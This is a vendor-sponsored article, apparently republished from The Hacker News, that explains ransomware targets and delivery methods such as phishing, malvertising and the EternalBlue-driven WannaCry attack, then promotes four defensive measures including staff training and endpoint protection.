Because there is no guarantee that cybercriminals will release data after a ransom is paid, it is crucial to protect your data and keep offline backups of your files. It’s also very important to proactively monitor and protect entry points that a hacker may exploit, to reduce the possibility of being targeted in the first place.

Who is at risk of being a target of ransomware?

In the past, cybercriminals have typically targeted high-profile organizations, large corporations and government agencies with ransomware. This is known as ‘big game hunting’ and works on the premise that these companies are far more likely to pay higher ransoms and avoid unwanted scrutiny from the media and public. Certain organizations, such as hospitals, are higher-value targets because they are far more likely to pay a ransom and to do so quickly because they need access to important data urgently.

However, ransomware groups are now shifting their focus to smaller businesses, in response to increased pressure from law enforcement who are cracking down on well-known ransomware groups such as REvil and Conti. Smaller companies are seen as easy targets that may lack effective cybersecurity defenses to prevent a ransomware attack, making it easier to penetrate and exploit them.

Ultimately, threat actors are opportunists and will consider most organizations as targets, regardless of their size. If a cybercriminal notices a vulnerability, the company is fair game.

How is ransomware deployed?

Phishing attacks

The most common delivery method of ransomware is via phishing attacks. Phishing is a form of social engineering and is an effective method of attack as it relies on deceit and creating a sense of urgency. Threat actors trick employees into opening suspicious attachments in emails and this is often achieved by imitating either senior-level employees or other trusted figures of authority.

Malvertising

Malicious advertising is another tactic used by cybercriminals to deploy ransomware, where ad space is purchased and infected with malware that is then displayed on trusted and legitimate websites. Once the ad is clicked, or even in some cases when a user accesses a website that’s hosting malware, that device is infected by malware that scans the device for vulnerabilities to exploit.

Exploiting vulnerable systems

Ransomware can also be deployed by exploiting unpatched and outdated systems, as was the case in 2017, when a security vulnerability in Microsoft Windows, EternalBlue (MS17-010), led to the global WannaCry ransomware attack that spread to over 150 countries.

It was the biggest cyberattack to hit the NHS: it cost £92m in damages plus the added costs of IT support restoring data and systems affected by the attack, and it directly impacted patient care through cancelled appointments.

Four key methods to defend your business against ransomware

It is crucial that businesses are aware of how a ransomware attack may affect their organization, and how they can prevent cybercriminals from breaching their systems and holding sensitive data to ransom. Up to 61% of organizations with security teams consisting of 11–25 employees are said to be most concerned about ransomware attacks.

The NHS could have avoided being impacted by the WannaCry ransomware attack in 2017 by heeding warnings and migrating away from outdated software, ensuring strategies were in place to strengthen their security posture.

It’s essential that your business takes a proactive approach to cybersecurity by implementing the correct tools to help monitor, detect, and mitigate suspicious activity across your network and infrastructure. This will reduce the number and impact of data breaches and cyberattacks.

Defense.com recommends these four fundamental tactics to help prevent ransomware attacks and stay one step ahead of the hackers:

1 — Training

Cybersecurity awareness training is pivotal for businesses of all sizes as it helps employees to spot potentially malicious emails or activity.

Social engineering tactics, such as phishing and tailgating, are common and successful due to human error and employees not spotting the risks. It’s vital for employees to be vigilant around emails that contain suspicious links or contain unusual requests to share personal data, often sent by someone pretending to be a senior-level employee.

Security training also encourages employees to query visitors to your offices to prevent ransomware attacks via physical intrusion.

Implementing cybersecurity awareness training will help your business routinely educate and assess your employees on fundamental security practices, ultimately creating a security culture to reduce the risk of data breaches and security incidents.

2 — Phishing simulators

These simulator tools support your security awareness training by delivering fake but realistic phishing emails to employees. Understanding how prone your staff are to falling for a real cybercriminal’s tactics allows you to fill gaps in their training.

When you combine phishing simulators with security training, your organization can lessen the chance of falling victim to a ransomware attack. The combination of training and testing puts you in a better position to prevent the cunning attempts of cybercriminals to infiltrate your IT systems and plant malware.

3 — Threat monitoring

You can make your business less of a target for cybercriminals by actively monitoring potential threats. Threat Intelligence is a threat monitoring tool that collates data from various sources, such as penetration tests and vulnerability scans, and uses this information to help you defend against potential malware and ransomware attacks. This overview of your threat landscape shows which areas are most at risk of a cyberattack or a data breach.

Being proactive ensures you stay one step ahead of hackers and by introducing threat monitoring tools to your organization, you ensure any suspicious behaviour is detected early for remediation.

4 — Endpoint protection

Endpoint protection is key to understanding which of your assets are vulnerable, to help protect them and repel malware attacks like ransomware. More than just your typical antivirus software, endpoint protection offers advanced security features that protect your network, and the devices on it, against threats such as malware and phishing campaigns.

Anti-ransomware capabilities should be included in endpoint protection so it can effectively prevent attacks by monitoring suspicious behaviour such as file changes and file encryption. The ability to isolate or quarantine any affected devices can also be a very useful feature for stopping the spread of malware.

In summary

With ransomware groups continually looking for vulnerabilities to exploit, it’s important that businesses develop robust strategies to prevent ransomware threats: ensure your staff takes regular security awareness training, set up threat monitoring tools to detect and alert you of vulnerabilities, and implement endpoint protection to protect your devices across your network.

Following the above guidelines will increase your chances of safeguarding your business against ransomware attacks that could cost your organization a substantial amount of money and reputational damage.

Defense.com believes world-class cyber protection should be accessible to all companies, regardless of size. For more information, visit Defense.com.

Source :
https://thehackernews.com/2022/08/what-is-ransomware-how-to-defend-your.html